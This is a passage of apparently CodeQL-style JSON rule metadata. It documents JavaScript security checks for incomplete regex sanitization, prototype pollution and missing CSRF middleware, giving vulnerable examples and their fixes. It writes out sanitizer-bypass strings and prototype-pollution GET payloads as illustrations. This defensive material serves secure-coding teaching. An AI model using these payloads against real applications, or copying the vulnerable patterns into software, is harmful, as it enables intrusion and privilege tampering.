\n\n```\n\n## Example\nAnother example is the following regular expression intended to remove script tags:\n\n```javascript\n\nstr.replace(/<script\\b[^<]*(?:(?!<\\/script>)<[^<]*)*<\\/script>/g, \"\");  \n\n```\nIf the input string is \"&lt;scrip&lt;script&gt;is removed&lt;/script&gt;t&gt;alert(123)&lt;/script&gt;\", the output will be \"&lt;script&gt;alert(123)&lt;/script&gt;\", which still contains a script tag.\n\nA fix for this issue is to rewrite the regular expression to match single characters (\"&lt;\" and \"&gt;\") instead of the entire unsafe text. This simplifies the sanitization process and ensures that all potentially unsafe characters are removed:\n\n```javascript\n\nfunction removeAllHtmlTags(input) {  \n  return input.replace(/<|>/g, \"\");  \n}\n\n```\nAnother potential fix is to use the popular `sanitize-html` npm library. It keeps most of the safe HTML tags while removing all unsafe tags and attributes.\n\n```javascript\n\nconst sanitizeHtml = require(\"sanitize-html\");\nfunction removeAllHtmlTags(input) {  \n  return sanitizeHtml(input);  \n}\n\n```\n\n## Example\nLastly, consider a path sanitizer using the regular expression `/\\.\\.\\//`:\n\n```javascript\n\nstr.replace(/\\.\\.\\//g, \"\");  \n\n```\nThe regular expression attempts to strip out all occurrences of `/../` from `str`. This will not work as expected: for the string `/./.././`, for example, it will remove the single occurrence of `/../` in the middle, but the remainder of the string then becomes `/../`, which is another instance of the substring we were trying to remove.\n\nA possible fix for this issue is to use the \"sanitize-filename\" npm library for path sanitization. This library is specifically designed to handle path sanitization, and should handle all corner cases and ensure effective sanitization:\n\n```javascript\n\nconst sanitize = require(\"sanitize-filename\");  \n  \nfunction sanitizePath(input) {  \n  return sanitize(input);  \n}  \n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* Stack Overflow: [Removing all script tags from HTML with JS regular expression](https://stackoverflow.com/questions/6659351/removing-all-script-tags-from-html-with-js-regular-expression).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/<!--|--!?>/g, \"\");   \n\n```\nGiven the input string \"&lt;!&lt;!--- comment ---&gt;&gt;\", the output will be \"&lt;!-- comment --&gt;\", which still contains an HTML comment.\n\nOne possible fix for this issue is to apply the regular expression replacement repeatedly until no more replacements can be performed. This ensures that the unsafe text does not re-appear in the sanitized input, effectively removing all instances of the targeted pattern:\n\n```javascript\n\nfunction removeHtmlComments(input) {  \n  let previous;  \n  do {  \n    previous = input;  \n    input = input.replace(/<!--|--!?>/g, \"\");  \n  } while (input !== previous);  \n  return input;  \n}  \n\n```\n\n## Example\nAnother example is the following regular expression intended to remove script tags:\n\n```javascript\n\nstr.replace(/<script\\b[^<]*(?:(?!<\\/script>)<[^<]*)*<\\/script>/g, \"\");  \n\n```\nIf the input string is \"&lt;scrip&lt;script&gt;is removed&lt;/script&gt;t&gt;alert(123)&lt;/script&gt;\", the output will be \"&lt;script&gt;alert(123)&lt;/script&gt;\", which still contains a script tag.\n\nA fix for this issue is to rewrite the regular expression to match single characters (\"&lt;\" and \"&gt;\") instead of the entire unsafe text. This simplifies the sanitization process and ensures that all potentially unsafe characters are removed:\n\n```javascript\n\nfunction removeAllHtmlTags(input) {  \n  return input.replace(/<|>/g, \"\");  \n}\n\n```\nAnother potential fix is to use the popular `sanitize-html` npm library. It keeps most of the safe HTML tags while removing all unsafe tags and attributes.\n\n```javascript\n\nconst sanitizeHtml = require(\"sanitize-html\");\nfunction removeAllHtmlTags(input) {  \n  return sanitizeHtml(input);  \n}\n\n```\n\n## Example\nLastly, consider a path sanitizer using the regular expression `/\\.\\.\\//`:\n\n```javascript\n\nstr.replace(/\\.\\.\\//g, \"\");  \n\n```\nThe regular expression attempts to strip out all occurrences of `/../` from `str`. This will not work as expected: for the string `/./.././`, for example, it will remove the single occurrence of `/../` in the middle, but the remainder of the string then becomes `/../`, which is another instance of the substring we were trying to remove.\n\nA possible fix for this issue is to use the \"sanitize-filename\" npm library for path sanitization. This library is specifically designed to handle path sanitization, and should handle all corner cases and ensure effective sanitization:\n\n```javascript\n\nconst sanitize = require(\"sanitize-filename\");  \n  \nfunction sanitizePath(input) {  \n  return sanitize(input);  \n}  \n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* Stack Overflow: [Removing all script tags from HTML with JS regular expression](https://stackoverflow.com/questions/6659351/removing-all-script-tags-from-html-with-js-regular-expression).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020","external/cwe/cwe-080","external/cwe/cwe-116"],"description":"A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence.","id":"js/incomplete-multi-character-sanitization","kind":"problem","name":"Incomplete multi-character sanitization","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/prototype-pollution-utility","name":"js/prototype-pollution-utility","shortDescription":{"text":"Prototype-polluting function"},"fullDescription":{"text":"Functions recursively assigning properties on objects may be the cause of accidental modification of a built-in prototype object."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (key === \"__proto__\" || key === \"constructor\") continue;\n        if (isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n","markdown":"# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (key === \"__proto__\" || key === \"constructor\") continue;\n        if (isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n"},"properties":{"tags":["security","external/cwe/cwe-078","external/cwe/cwe-079","external/cwe/cwe-094","external/cwe/cwe-400","external/cwe/cwe-471","external/cwe/cwe-915"],"description":"Functions recursively assigning properties on objects may be\n              the cause of accidental modification of a built-in prototype object.","id":"js/prototype-pollution-utility","kind":"path-problem","name":"Prototype-polluting function","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/prototype-polluting-assignment","name":"js/prototype-polluting-assignment","shortDescription":{"text":"Prototype-polluting assignment"},"fullDescription":{"text":"Modifying an object obtained via a user-controlled property name may lead to accidental mutation of the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    let items = req.session.todos[id];\n    if (!items) {\n        items = req.session.todos[id] = {};\n    }\n    items[req.query.name] = req.query.text;\n    res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    let items = req.session.todos.get(id);\n    if (!items) {\n        items = new Map();\n        req.sessions.todos.set(id, items);\n    }\n    items.set(req.query.name, req.query.text);\n    res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n        res.end(403);\n        return;\n    }\n    let items = req.session.todos[id];\n    if (!items) {\n        items = req.session.todos[id] = {};\n    }\n    items[req.query.name] = req.query.text;\n    res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n","markdown":"# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    let items = req.session.todos[id];\n    if (!items) {\n        items = req.session.todos[id] = {};\n    }\n    items[req.query.name] = req.query.text;\n    res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    let items = req.session.todos.get(id);\n    if (!items) {\n        items = new Map();\n        req.sessions.todos.set(id, items);\n    }\n    items.set(req.query.name, req.query.text);\n    res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n        res.end(403);\n        return;\n    }\n    let items = req.session.todos[id];\n    if (!items) {\n        items = req.session.todos[id] = {};\n    }\n    items[req.query.name] = req.query.text;\n    res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n"},"properties":{"tags":["security","external/cwe/cwe-078","external/cwe/cwe-079","external/cwe/cwe-094","external/cwe/cwe-400","external/cwe/cwe-471","external/cwe/cwe-915"],"description":"Modifying an object obtained via a user-controlled property name may\n              lead to accidental mutation of the built-in Object prototype,\n              and possibly escalate to remote code execution or cross-site scripting.","id":"js/prototype-polluting-assignment","kind":"path-problem","name":"Prototype-polluting assignment","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/prototype-pollution","name":"js/prototype-pollution","shortDescription":{"text":"Prototype-polluting merge call"},"fullDescription":{"text":"Recursively merging a user-controlled object into another object can allow an attacker to modify the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n  let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n  \"dependencies\": {\n    \"lodash\": \"^4.17.12\"\n  }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n  let config = lodash.merge({}, {\n    prefs: req.query.prefs\n  });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n","markdown":"# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n  let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n  \"dependencies\": {\n    \"lodash\": \"^4.17.12\"\n  }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n  let config = lodash.merge({}, {\n    prefs: req.query.prefs\n  });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n"},"properties":{"tags":["security","external/cwe/cwe-078","external/cwe/cwe-079","external/cwe/cwe-094","external/cwe/cwe-400","external/cwe/cwe-471","external/cwe/cwe-915"],"description":"Recursively merging a user-controlled object into another object\n              can allow an attacker to modify the built-in Object prototype,\n              and possibly escalate to remote code execution or cross-site scripting.","id":"js/prototype-pollution","kind":"path-problem","name":"Prototype-polluting merge call","precision":"high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/missing-token-validation","name":"js/missing-token-validation","shortDescription":{"text":"Missing CSRF middleware"},"fullDescription":{"text":"Using cookies without CSRF protection may allow malicious websites to submit requests on behalf of the user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n  cookieParser = require(\"cookie-parser\"),\n  bodyParser = require(\"body-parser\"),\n  session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n  const userId = req.session.id;\n  const email = req.body[\"email\"];\n  // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n  cookieParser = require(\"cookie-parser\"),\n  bodyParser = require(\"body-parser\"),\n  session = require(\"express-session\"),\n  csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n  const userId = req.session.id;\n  const email = req.body[\"email\"];\n  // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n","markdown":"# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n  cookieParser = require(\"cookie-parser\"),\n  bodyParser = require(\"body-parser\"),\n  session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n  const userId = req.session.id;\n  const email = req.body[\"email\"];\n  // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n  cookieParser = require(\"cookie-parser\"),\n  bodyParser = require(\"body-parser\"),\n  session = require(\"express-session\"),\n  csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n  const userId = req.session.id;\n  const email = req.body[\"email\"];\n  // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n"},"properties":{"tags":["security","external/cwe/cwe-352"],"description":"Using cookies without CSRF protection may allow malicious websites to\n              submit requests on behalf of the user.","id":"js/missing-token-validation","kind":"problem","name":"Missing CSRF middleware","precision":"high","problem.severity":"error","security-severity":"8.8"}},{"id":"js/unvalidated-dynamic-method-call","name":"js/unvalidated-dynamic-method-call","shortDescription":{"text":"Unvalidated dynamic method call"},"fullDescription":{"text":"Calling a method with a user-controlled name may 